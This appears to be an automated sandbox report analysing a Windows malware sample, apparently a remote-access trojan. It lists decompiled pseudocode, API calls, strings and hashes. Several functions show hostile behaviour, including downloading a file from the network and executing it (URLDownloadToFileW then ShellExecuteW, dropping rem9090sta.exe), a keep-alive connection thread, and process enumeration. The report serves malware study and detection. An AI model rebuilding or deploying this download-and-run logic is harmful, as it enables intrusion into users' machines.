                                                                                                					asm("sbb esi, esi");
                                                                                                					_t100 =  ~(_t89 -  &_v268) & _t89;
                                                                                                					__eflags = _t89;
                                                                                                					if(__eflags == 0) {
                                                                                                						L33:
                                                                                                						E004440B8(_t77, _t89, _t100, __eflags);
                                                                                                					} else {
                                                                                                						__eflags =  *_t89;
                                                                                                						if(__eflags == 0) {
                                                                                                							goto L33;
                                                                                                						} else {
                                                                                                							_push(_t89);
                                                                                                							E00443EE3(_t77, _t89, _t100, __eflags);
                                                                                                						}
                                                                                                					}
                                                                                                					E004414D5(_t100);
                                                                                                					__eflags = _v12 ^ _t106;
                                                                                                					return E00430A5B(_v12 ^ _t106);
                                                                                                				} else {
                                                                                                					_t54 = E00443B28( &_v12);
                                                                                                					_pop(_t78);
                                                                                                					if(_t54 != 0) {
                                                                                                						goto L19;
                                                                                                					} else {
                                                                                                						_t56 = E00443B54( &_v16);
                                                                                                						_pop(_t78);
                                                                                                						if(_t56 != 0) {
                                                                                                							goto L19;
                                                                                                						} else {
                                                                                                							E004414D5( *0x46d740);
                                                                                                							 *0x46d740 = 0;
                                                                                                							 *_t107 = 0x46d750;
                                                                                                							if(GetTimeZoneInformation(??) != 0xffffffff) {
                                                                                                								_t85 =  *0x46d750 * 0x3c;
                                                                                                								_t87 =  *0x46d7a4; // 0x0
                                                                                                								_push(__edi);
                                                                                                								 *0x46d748 = 1;
                                                                                                								_v8 = _t85;
                                                                                                								_t116 =  *0x46d796; // 0x0
                                                                                                								if(_t116 != 0) {
                                                                                                									_v8 = _t85 + _t87 * 0x3c;
                                                                                                								}
                                                                                                								_t118 =  *0x46d7ea; // 0x0
                                                                                                								if(_t118 == 0) {
                                                                                                									L9:
                                                                                                									_v12 = 0;
                                                                                                									_v16 = 0;
                                                                                                								} else {
                                                                                                									_t71 =  *0x46d7f8; // 0x0
                                                                                                									if(_t71 == 0) {
                                                                                                										goto L9;
                                                                                                									} else {
                                                                                                										_v12 = 1;
                                                                                                										_v16 = (_t71 - _t87) * 0x3c;
                                                                                                									}
                                                                                                								}
                                                                                                								_t93 = E0044083B(0, _t87);
                                                                                                								if(WideCharToMultiByte(_t93, 0, 0x46d754, 0xffffffff,  *_t96, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
                                                                                                									 *( *_t96) = 0;
                                                                                                								} else {
                                                                                                									( *_t96)[0x3f] = 0;
                                                                                                								}
                                                                                                								if(WideCharToMultiByte(_t93, 0, 0x46d7a8, 0xffffffff, _t96[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
                                                                                                									 *(_t96[1]) = 0;
                                                                                                								} else {
                                                                                                									_t96[1][0x3f] = 0;
                                                                                                								}
                                                                                                							}
                                                                                                							 *(E00443B1C()) = _v8;
                                                                                                							 *(E00443B10()) = _v12;
                                                                                                							_t61 = E00443B16();
                                                                                                							 *_t61 = _v16;
                                                                                                							return _t61;
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                 			}

                                                                                                APIs
                                                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045A1AC), ref: 00444122
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0046D754,000000FF,00000000,0000003F,00000000,?,?), ref: 0044419A
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0046D7A8,000000FF,?,0000003F,00000000,?), ref: 004441C7
                                                                                                • _free.LIBCMT ref: 00444110
                                                                                                  • Part of subcall function 004414D5: HeapFree.KERNEL32(00000000,00000000,?,0044A13F,?,00000000,?,00000000,?,0044A3E3,?,00000007,?,?,0044A92E,?), ref: 004414EB
                                                                                                  • Part of subcall function 004414D5: GetLastError.KERNEL32(?,?,0044A13F,?,00000000,?,00000000,?,0044A3E3,?,00000007,?,?,0044A92E,?,?), ref: 004414FD
                                                                                                • _free.LIBCMT ref: 004442DC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                 • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                 • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                 • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                • String ID:
                                                                                                • API String ID: 1286116820-0
                                                                                                • Opcode ID: 02ae79e005892dcc5bcdea75217d5923d56ab98353f4b2a4e9de9ba00b4f3427
                                                                                                • Instruction ID: 56df1fdb0d2c8a7936ce496f4277ed661e93f241b12f8068f7736a0ffc027213
                                                                                                • Opcode Fuzzy Hash: 02ae79e005892dcc5bcdea75217d5923d56ab98353f4b2a4e9de9ba00b4f3427
                                                                                                • Instruction Fuzzy Hash: 0A512B71D00204ABEB10EF65DC85AAAB7BCEF90355B10026FF450D7291EB789E41C75A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 72%
                                                                                                			E00405E28(short* __edx, void* __eflags, intOrPtr _a4, char _a8) {
                                                                                                				char _v28;
                                                                                                				char _v44;
                                                                                                				char _v60;
                                                                                                				char _v64;
                                                                                                				char _v68;
                                                                                                				char _v72;
                                                                                                				char _v76;
                                                                                                				char _v84;
                                                                                                				void* _v104;
                                                                                                				void* __ebx;
                                                                                                				void* __ebp;
                                                                                                				intOrPtr* _t33;
                                                                                                				void* _t50;
                                                                                                				signed char _t54;
                                                                                                				intOrPtr* _t57;
                                                                                                				void* _t59;
                                                                                                				void* _t63;
                                                                                                				void* _t70;
                                                                                                				void* _t72;
                                                                                                				void* _t77;
                                                                                                				intOrPtr* _t79;
                                                                                                				void* _t81;
                                                                                                				void* _t83;
                                                                                                				void* _t84;
                                                                                                				void* _t86;
                                                                                                				void* _t88;
                                                                                                				void* _t106;
                                                                                                				void* _t120;
                                                                                                				void* _t144;
                                                                                                				void* _t148;
                                                                                                				signed int _t155;
                                                                                                				void* _t158;
                                                                                                				void* _t159;
                                                                                                				void* _t160;
                                                                                                				void* _t162;
                                                                                                				void* _t166;
                                                                                                				void* _t167;
                                                                                                
                                                                                                				_t167 = __eflags;
                                                                                                				_t140 = __edx;
                                                                                                				_t33 = E00401F87( &_a8);
                                                                                                				_push(0xffffffff);
                                                                                                				_t88 = 4;
                                                                                                				_push(_t88);
                                                                                                				_push( &_v28);
                                                                                                				E00404287( &_a8);
                                                                                                				_t158 = (_t155 & 0xfffffff8) - 0x2c;
                                                                                                				E004020DE(_t88, _t158, __edx, _t167, 0x46e250);
                                                                                                				_t159 = _t158 - 0x18;
                                                                                                				E004020DE(_t88, _t159, __edx, _t167,  &_v44);
                                                                                                				E00417E68( &_v84, _t140);
                                                                                                				_t160 = _t159 + 0x30;
                                                                                                				_t148 =  *_t33 - _t88;
                                                                                                				if(_t148 == 0) {
                                                                                                					_t144 = 0;
                                                                                                					E00401E3B( &_v64, _t140, __eflags, 0);
                                                                                                					_t141 = "F";
                                                                                                					__eflags = E00405C1B("F");
                                                                                                					if(__eflags == 0) {
                                                                                                						E00401E3B( &_v68, "F", __eflags, 0);
                                                                                                						_t140 = "M";
                                                                                                						__eflags = E00405C1B("M");
                                                                                                						if(__eflags == 0) {
                                                                                                							L23:
                                                                                                							E00401E66( &_v64, _t140);
                                                                                                							E00401FB9();
                                                                                                							E00401FB9();
                                                                                                							return 0;
                                                                                                						}
                                                                                                						_v68 = 0;
                                                                                                						_t50 = E00401F87(E00401E3B( &_v64, "M", __eflags, _t88));
                                                                                                						_t140 =  &_v76;
                                                                                                						__eflags = E00417B01(_t50,  &_v76,  &_v68);
                                                                                                						if(__eflags == 0) {
                                                                                                							_t106 = _t160 - 0x18;
                                                                                                							_push("2");
                                                                                                							L22:
                                                                                                							E00402076(_t88, _t106);
                                                                                                							_push(0xb3);
                                                                                                							E00404BB7(_t88, _a4, _t140, __eflags);
                                                                                                							goto L23;
                                                                                                						}
                                                                                                						_t140 = _v72;
                                                                                                						_t54 = E00414D29(0x46daf8);
                                                                                                						L00437769(_v72);
                                                                                                						_t162 = _t160 - 0x18;
                                                                                                						__eflags = (_t54 & 0x000000ff) - 1;
                                                                                                						L9:
                                                                                                						_t106 = _t162;
                                                                                                						if(__eflags != 0) {
                                                                                                							_push("3");
                                                                                                						} else {
                                                                                                							_push("1");
                                                                                                						}
                                                                                                						goto L22;
                                                                                                					}
                                                                                                					_t57 = E00401F87(E00401E3B( &_v68, "F", __eflags, 2));
                                                                                                					_t59 = E00401F87(E00401E3B( &_v68, _t141, __eflags, 3));
                                                                                                					_t140 =  *_t57;
                                                                                                					E00418A4B( &_v60,  *_t57, _t59);
                                                                                                					_t63 = E00401F87(E00401E3B( &_v72,  *_t57, __eflags, _t88));
                                                                                                					__imp__URLDownloadToFileW(0, _t63, E00401EDD( &_v60), 0, 0);
                                                                                                					__eflags = _t63;
                                                                                                					if(__eflags == 0) {
                                                                                                						L4:
                                                                                                						if( *((char*)(E00401F87(E00401E3B( &_v84, _t140, _t171, 1)))) == 0) {
                                                                                                							_t120 = _t160 - 0x18;
                                                                                                							_push("0");
                                                                                                						} else {
                                                                                                							_t70 = ShellExecuteW(_t144, L"open", E00401EDD( &_v72), _t144, _t144, 1);
                                                                                                							_t120 = _t160 - 0x18;
                                                                                                							_t173 = _t70 - 0x20;
                                                                                                							if(_t70 > 0x20) {
                                                                                                								_push("1");
                                                                                                							} else {
                                                                                                								_push("3");
                                                                                                							}
                                                                                                						}
                                                                                                						L17:
                                                                                                						E00402076(_t88, _t120);
                                                                                                						_push(0xb3);
                                                                                                						E00404BB7(_t88, _a4, _t140, _t173);
                                                                                                						E00401EE2();
                                                                                                						goto L23;
                                                                                                					}
                                                                                                					L14:
                                                                                                					_t120 = _t160 - 0x18;
                                                                                                					_push("2");
                                                                                                					goto L17;
                                                                                                				}
                                                                                                				_t169 = _t148 != 1;
                                                                                                				if(_t148 != 1) {
                                                                                                					goto L23;
                                                                                                				}
                                                                                                				_t144 = 0;
                                                                                                				E00401E3B( &_v64, _t140, _t169, 0);
                                                                                                				_t142 = "F";
                                                                                                				_t72 = E00405C1B("F");
                                                                                                				_t170 = _t72;
                                                                                                				if(_t72 == 0) {
                                                                                                					E00401E3B( &_v68, "F", __eflags, 0);
                                                                                                					_t140 = "M";
                                                                                                					__eflags = E00405C1B("M");
                                                                                                					if(__eflags == 0) {
                                                                                                						goto L23;
                                                                                                					} else {
                                                                                                						_t140 = E00401F87(E00401E3B( &_v64, "M", __eflags, _t88));
                                                                                                						_t77 = E00414D29(0x46daf8);
                                                                                                						_t162 = _t160 - 0x18;
                                                                                                						__eflags = _t77 - 1;
                                                                                                						goto L9;
                                                                                                					}
                                                                                                				}
                                                                                                				_t79 = E00401F87(E00401E3B( &_v68, "F", _t170, 2));
                                                                                                				_t81 = E00401F87(E00401E3B( &_v68, _t142, _t170, 3));
                                                                                                				_t140 =  *_t79;
                                                                                                				E00418A4B( &_v60,  *_t79, _t81);
                                                                                                				_t83 = E00401EDD( &_v60);
                                                                                                				_t84 = E00401E3B( &_v72,  *_t79, _t170, _t88);
                                                                                                				_t166 = _t160 - 0x18;
                                                                                                				E004020DE(_t88, _t166, _t140, _t170, _t84);
                                                                                                				_t86 = E0041843E(_t83);
                                                                                                				_t160 = _t166 + 0x18;
                                                                                                				_t171 = _t86 - 1;
                                                                                                				if(_t86 != 1) {
                                                                                                					goto L14;
                                                                                                				}
                                                                                                				goto L4;
                                                                                                			}

                                                                                                0x00405f06
                                                                                                0x00405f09
                                                                                                0x00405f0b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00405F40
                                                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406024
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DownloadExecuteFileShell
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\rem9090sta.exe$open
                                                                                                • API String ID: 2825088817-1143938698
                                                                                                • Opcode ID: a4dd419c696ae0d0248e5aa65d548bca7d7e39d9684c990360edbd319c8855ca
                                                                                                • Instruction ID: 62a2329586a9e067be36f797b192da2b2e54cee08630cab9a0d64ec101ad354f
                                                                                                • Opcode Fuzzy Hash: a4dd419c696ae0d0248e5aa65d548bca7d7e39d9684c990360edbd319c8855ca
                                                                                                • Instruction Fuzzy Hash: CB61EF7160430116CA14FB76C8969BF32A99B81348F500A3FF843772D2EE3C9D4A869B
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 90%
                                                                                                			E00405038(void* __ecx, intOrPtr _a4, char _a8) {
                                                                                                				struct _SYSTEMTIME _v20;
                                                                                                				char _v44;
                                                                                                				void* __edi;
                                                                                                				void* _t16;
                                                                                                				void* _t21;
                                                                                                				intOrPtr _t29;
                                                                                                				void* _t31;
                                                                                                				void* _t32;
                                                                                                
                                                                                                				_t31 = __ecx;
                                                                                                				if( *((char*)(__ecx + 0x5c)) != 0) {
                                                                                                					__eflags = 0;
                                                                                                					return 0;
                                                                                                				}
                                                                                                				_t29 = _a4;
                                                                                                				if(_a8 != 0) {
                                                                                                					__eflags =  *0x46daf7;
                                                                                                					if( *0x46daf7 != 0) {
                                                                                                						GetLocalTime( &_v20);
                                                                                                						_t16 = E00417C16(_t21,  &_v44, _t29);
                                                                                                						_t33 = _t32 - 0x18;
                                                                                                						E004053F2(_t21, _t32 - 0x18, "Connection KeepAlive  | Enabled | Timeout: ", _t29, __eflags, _t16);
                                                                                                						E00402076(_t21, _t33 - 0x14, "i");
                                                                                                						E00417670(_t21, _t29);
                                                                                                						E00401FB9();
                                                                                                					}
                                                                                                				} else {
                                                                                                					 *((char*)(__ecx + 0x7c)) = 1;
                                                                                                				}
                                                                                                				 *((intOrPtr*)(_t31 + 0x74)) = _t29;
                                                                                                				 *((char*)(_t31 + 0x5c)) = 1;
                                                                                                				 *((intOrPtr*)(_t31 + 0x60)) = CreateEventA(0, 0, 0, 0);
                                                                                                				CreateThread(0, 0, E00405237, _t31, 0, 0);
                                                                                                				return 1;
                                                                                                			}












                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(?), ref: 00405068
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004050B4
                                                                                                • CreateThread.KERNEL32(00000000,00000000,00405237,?,00000000,00000000), ref: 004050C7
                                                                                                Strings
                                                                                                • Connection KeepAlive | Enabled | Timeout: , xrefs: 0040507B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Create$EventLocalThreadTime
                                                                                                • String ID: Connection KeepAlive | Enabled | Timeout:
                                                                                                • API String ID: 2532271599-507513762
                                                                                                • Opcode ID: 1bd94366b2bec91859cbdac8bdfae94c1b43c4a1124927e236addb255ca7d1d5
                                                                                                • Instruction ID: 3f96d6673231960727e2550b4967c774dcc62df2d79dd627a582bacf63a0d9ff
                                                                                                • Opcode Fuzzy Hash: 1bd94366b2bec91859cbdac8bdfae94c1b43c4a1124927e236addb255ca7d1d5
                                                                                                • Instruction Fuzzy Hash: 3D11A3719047806BC720A76B9C0DE9B7FBCDBD2754F04406FF84166292DAB89485CFB6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 68%
                                                                                                			E0044B1A8(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed short* _a8, intOrPtr _a12) {
                                                                                                				intOrPtr* _v8;
                                                                                                				short _v12;
                                                                                                				signed int _v32;
                                                                                                				intOrPtr _v40;
                                                                                                				signed int _v52;
                                                                                                				char _v272;
                                                                                                				short _v292;
                                                                                                				void* __ebp;
                                                                                                				void* _t34;
                                                                                                				short* _t35;
                                                                                                				intOrPtr* _t36;
                                                                                                				signed int _t39;
                                                                                                				signed short* _t44;
                                                                                                				intOrPtr _t47;
                                                                                                				void* _t49;
                                                                                                				signed int _t52;
                                                                                                				signed int _t58;
                                                                                                				signed int _t60;
                                                                                                				signed int _t66;
                                                                                                				void* _t68;
                                                                                                				void* _t71;
                                                                                                				void* _t76;
                                                                                                				void* _t80;
                                                                                                				intOrPtr _t87;
                                                                                                				short* _t89;
                                                                                                				void* _t90;
                                                                                                				void* _t92;
                                                                                                				short _t94;
                                                                                                				void* _t95;
                                                                                                				intOrPtr* _t98;
                                                                                                				void* _t112;
                                                                                                				void* _t116;
                                                                                                				intOrPtr* _t118;
                                                                                                				intOrPtr _t121;
                                                                                                				signed int* _t122;
                                                                                                				intOrPtr* _t125;
                                                                                                				signed short _t127;
                                                                                                				int _t129;
                                                                                                				signed int _t132;
                                                                                                				void* _t133;
                                                                                                				signed int _t134;
                                                                                                
                                                                                                				_t115 = __edx;
                                                                                                				_push(__ecx);
                                                                                                				_push(__ecx);
                                                                                                				_push(__ebx);
                                                                                                				_push(__esi);
                                                                                                				_push(__edi);
                                                                                                				_t34 = E00442F68(__ebx, __ecx, __edx);
                                                                                                				_t87 = _a4;
                                                                                                				_t94 = 0;
                                                                                                				_v12 = 0;
                                                                                                				_t3 = _t34 + 0x50; // 0x50
                                                                                                				_t125 = _t3;
                                                                                                				_t4 = _t125 + 0x250; // 0x2a0
                                                                                                				_t35 = _t4;
                                                                                                				 *((intOrPtr*)(_t125 + 8)) = 0;
                                                                                                				 *_t35 = 0;
                                                                                                				_t6 = _t125 + 4; // 0x54
                                                                                                				_t118 = _t6;
                                                                                                				_v8 = _t35;
                                                                                                				_t36 = _t87 + 0x80;
                                                                                                				 *_t125 = _t87;
                                                                                                				 *_t118 = _t36;
                                                                                                				if( *_t36 != 0) {
                                                                                                					E0044B139(0x45af00, 0x16, _t118);
                                                                                                					_t133 = _t133 + 0xc;
                                                                                                					_t94 = 0;
                                                                                                				}
                                                                                                				_push(_t125);
                                                                                                				if( *((intOrPtr*)( *_t125)) == _t94) {
                                                                                                					E0044AAAA(_t87, _t94, _t115, _t118, __eflags);
                                                                                                					goto L12;
                                                                                                				} else {
                                                                                                					if( *((intOrPtr*)( *_t118)) == _t94) {
                                                                                                						E0044ABCD();
                                                                                                					} else {
                                                                                                						E0044AB33(_t94);
                                                                                                					}
                                                                                                					_pop(_t95);
                                                                                                					if( *((intOrPtr*)(_t125 + 8)) == 0) {
                                                                                                						_t80 = E0044B139(0x45abf0, 0x40, _t125);
                                                                                                						_t133 = _t133 + 0xc;
                                                                                                						if(_t80 != 0) {
                                                                                                							_push(_t125);
                                                                                                							if( *((intOrPtr*)( *_t118)) == 0) {
                                                                                                								E0044ABCD();
                                                                                                							} else {
                                                                                                								E0044AB33(0);
                                                                                                							}
                                                                                                							L12:
                                                                                                							_pop(_t95);
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				if( *((intOrPtr*)(_t125 + 8)) == 0) {
                                                                                                					L31:
                                                                                                					_t39 = 0;
                                                                                                					__eflags = 0;
                                                                                                					goto L32;
                                                                                                				} else {
                                                                                                					_t127 = E0044B007(_t95, _t87 + 0x100, _t125);
                                                                                                					if(_t127 == 0 || _t127 == 0xfde8 || _t127 == 0xfde9 || IsValidCodePage(_t127 & 0x0000ffff) == 0) {
                                                                                                						goto L31;
                                                                                                					} else {
                                                                                                						_t44 = _a8;
                                                                                                						if(_t44 != 0) {
                                                                                                							 *_t44 = _t127;
                                                                                                						}
                                                                                                						_t121 = _a12;
                                                                                                						if(_t121 == 0) {
                                                                                                							L30:
                                                                                                							_t39 = 1;
                                                                                                							goto L32;
                                                                                                						} else {
                                                                                                							_t98 = _v8;
                                                                                                							_t15 = _t121 + 0x120; // 0x43f6c8
                                                                                                							_t89 = _t15;
                                                                                                							 *_t89 = 0;
                                                                                                							_t116 = _t98 + 2;
                                                                                                							do {
                                                                                                								_t47 =  *_t98;
                                                                                                								_t98 = _t98 + 2;
                                                                                                							} while (_t47 != _v12);
                                                                                                							_t100 = _t98 - _t116 >> 1;
                                                                                                							_push((_t98 - _t116 >> 1) + 1);
                                                                                                							_t49 = E00449599(_t98 - _t116 >> 1, _t89, 0x55, _v8);
                                                                                                							_t134 = _t133 + 0x10;
                                                                                                							_t153 = _t49;
                                                                                                							if(_t49 != 0) {
                                                                                                								_push(0);
                                                                                                								_push(0);
                                                                                                								_push(0);
                                                                                                								_push(0);
                                                                                                								_push(0);
                                                                                                								E00437736();
                                                                                                								asm("int3");
                                                                                                								_t132 = _t134;
                                                                                                								_t52 =  *0x46c00c; // 0x4cc22724
                                                                                                								_v52 = _t52 ^ _t132;
                                                                                                								_push(_t89);
                                                                                                								_push(_t127);
                                                                                                								_push(_t121);
                                                                                                								_t90 = E00442F68(_t89, _t100, _t116);
                                                                                                								_t122 =  *(E00442F68(_t90, _t100, _t116) + 0x34c);
                                                                                                								_t129 = E0044B8BB(_v40);
                                                                                                								asm("sbb ecx, ecx");
                                                                                                								_t58 = GetLocaleInfoW(_t129, ( ~( *(_t90 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
                                                                                                								__eflags = _t58;
                                                                                                								if(_t58 != 0) {
                                                                                                									_t60 = E0044E1A1(_t90, _t122, _t129,  *((intOrPtr*)(_t90 + 0x54)),  &_v272);
                                                                                                									__eflags = _t60;
                                                                                                									if(_t60 == 0) {
                                                                                                										_t66 = E0044B9EF(_t129);
                                                                                                										__eflags = _t66;
                                                                                                										if(_t66 != 0) {
                                                                                                											 *_t122 =  *_t122 | 0x00000004;
                                                                                                											__eflags =  *_t122;
                                                                                                											_t122[2] = _t129;
                                                                                                											_t122[1] = _t129;
                                                                                                										}
                                                                                                									}
                                                                                                									__eflags =  !( *_t122 >> 2) & 0x00000001;
                                                                                                								} else {
                                                                                                									 *_t122 =  *_t122 & _t58;
                                                                                                								}
                                                                                                								__eflags = _v32 ^ _t132;
                                                                                                								return E00430A5B(_v32 ^ _t132);
                                                                                                							} else {
                                                                                                								_t68 = E00443640(_t100, _t127, _t153, _t89, 0x1001, _t121, 0x40);
                                                                                                								_t154 = _t68;
                                                                                                								if(_t68 == 0) {
                                                                                                									goto L31;
                                                                                                								} else {
                                                                                                									_t20 = _t121 + 0x80; // 0x43f628
                                                                                                									_t92 = _t20;
                                                                                                									_t21 = _t121 + 0x120; // 0x43f6c8
                                                                                                									if(E00443640(_t100, _t127, _t154, _t21, 0x1002, _t92, 0x40) == 0) {
                                                                                                										goto L31;
                                                                                                									} else {
                                                                                                										_push(0x5f);
                                                                                                										_t71 = E00452197(_t100);
                                                                                                										_t112 = _t92;
                                                                                                										if(_t71 != 0) {
                                                                                                											L28:
                                                                                                											_t22 = _t121 + 0x120; // 0x43f6c8
                                                                                                											if(E00443640(_t112, _t127, _t157, _t22, 7, _t92, 0x40) == 0) {
                                                                                                												goto L31;
                                                                                                											} else {
                                                                                                												goto L29;
                                                                                                											}
                                                                                                										} else {
                                                                                                											_push(0x2e);
                                                                                                											_t76 = E00452197(_t112);
                                                                                                											_t112 = _t92;
                                                                                                											_t157 = _t76;
                                                                                                											if(_t76 == 0) {
                                                                                                												L29:
                                                                                                												_t23 = _t121 + 0x100; // 0x43f6a8
                                                                                                												E0043CE14(_t112, _t127, _t23, 0x10, 0xa);
                                                                                                												goto L30;
                                                                                                											} else {
                                                                                                												goto L28;
                                                                                                											}
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                								L32:
                                                                                                								return _t39;
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                			}

                                                                                                APIs
                                                                                                  • Part of subcall function 00442F68: GetLastError.KERNEL32(?,0043CA3A,004362A5,0043CA3A,0046E268,?,0043A7BA,FF8BC35D,0046E268,0046E268), ref: 00442F6C
                                                                                                  • Part of subcall function 00442F68: _free.LIBCMT ref: 00442F9F
                                                                                                  • Part of subcall function 00442F68: SetLastError.KERNEL32(00000000,FF8BC35D,0046E268,0046E268), ref: 00442FE0
                                                                                                  • Part of subcall function 00442F68: _abort.LIBCMT ref: 00442FE6
                                                                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0043F5A8,?,?,?,?,0043EFFF,?,00000004), ref: 0044B28A
                                                                                                • _wcschr.LIBVCRUNTIME ref: 0044B31A
                                                                                                • _wcschr.LIBVCRUNTIME ref: 0044B328
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,0043F5A8,00000000,0043F6C8), ref: 0044B3CB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                • String ID:
                                                                                                • API String ID: 4212172061-0
                                                                                                • Opcode ID: 1370c1f50b4f1f3129fb197c9123c441405972bfb2e2033a346c40f78388a1a4
                                                                                                • Instruction ID: e7cff9f53cbf318a7152ade50442d9f1eda1ec1d3f6e12deb6ca4520c2250c00
                                                                                                • Opcode Fuzzy Hash: 1370c1f50b4f1f3129fb197c9123c441405972bfb2e2033a346c40f78388a1a4
                                                                                                • Instruction Fuzzy Hash: C661F871600706AAF724AF76CC46AAB73A8FF08704F14046FF905D7281EB78ED5187A9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E0040D25B(void* __ebx, void* __ecx, void* __eflags) {
                                                                                                				char _v28;
                                                                                                				char _v52;
                                                                                                				char _v76;
                                                                                                				char _v100;
                                                                                                				char _v124;
                                                                                                				char _v148;
                                                                                                				char _v172;
                                                                                                				char _v196;
                                                                                                				char _v220;
                                                                                                				char _v244;
                                                                                                				char _v268;
                                                                                                				char _v292;
                                                                                                				char _v316;
                                                                                                				char _v340;
                                                                                                				char _v864;
                                                                                                				intOrPtr _v892;
                                                                                                				void* _v900;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* _t47;
                                                                                                				void* _t48;
                                                                                                				void* _t50;
                                                                                                				void* _t129;
                                                                                                				void* _t130;
                                                                                                
                                                                                                				_t77 = __ecx;
                                                                                                				_t76 = __ebx;
                                                                                                				_t129 = __ecx;
                                                                                                				E004020C7(__ebx, __ecx);
                                                                                                				 *0x46dea8 = E00418004(_t77);
                                                                                                				_t130 = CreateToolhelp32Snapshot(2, 0);
                                                                                                				if(_t130 != 0) {
                                                                                                					_v900 = 0x22c;
                                                                                                					Process32FirstW(_t130,  &_v900);
                                                                                                					while(Process32NextW(_t130,  &_v900) != 0) {
                                                                                                						E00404260(_t76,  &_v28,  &_v864);
                                                                                                						_t47 = E00417C16(_t76,  &_v340, E00418032(_v892) & 0x000000ff);
                                                                                                						_t48 = E00417C16(_t76,  &_v316, _v892);
                                                                                                						_t50 = E00417D8C(_t76,  &_v268, E00418068( &_v292, _v892));
                                                                                                						E00401FC3(_t129, _t58, _t130, E004076BB(_t76,  &_v52, E00402F0F( &_v76, E004076BB(_t76,  &_v100, E00402F0F( &_v124, E004076BB(_t76,  &_v148, E00402F0F( &_v172, E004076BB(_t76,  &_v196, E00407653(_t76,  &_v220, _t129, __eflags, E00417D8C(_t76,  &_v244,  &_v28)), _t129, __eflags, 0x4616b8), _t50), _t129, __eflags, 0x4616b8), _t48), _t129, __eflags, 0x4616b8), _t47), _t129, __eflags, "|"));
                                                                                                						E00401FB9();
                                                                                                						E00401FB9();
                                                                                                						E00401FB9();
                                                                                                						E00401FB9();
                                                                                                						E00401FB9();
                                                                                                						E00401FB9();
                                                                                                						E00401FB9();
                                                                                                						E00401FB9();
                                                                                                						E00401FB9();
                                                                                                						E00401FB9();
                                                                                                						E00401EE2();
                                                                                                						E00401FB9();
                                                                                                						E00401FB9();
                                                                                                						E00401EE2();
                                                                                                					}
                                                                                                					CloseHandle(_t130);
                                                                                                				}
                                                                                                				return _t129;
                                                                                                			}




























                                                                                                APIs
                                                                                                  • Part of subcall function 00418004: GetCurrentProcess.KERNEL32(?,?,?,00418AC1,WinDir,00000000,00000000), ref: 00418015
                                                                                                  • Part of subcall function 00418004: IsWow64Process.KERNEL32(00000000,?,?,00418AC1,WinDir,00000000,00000000), ref: 0041801C
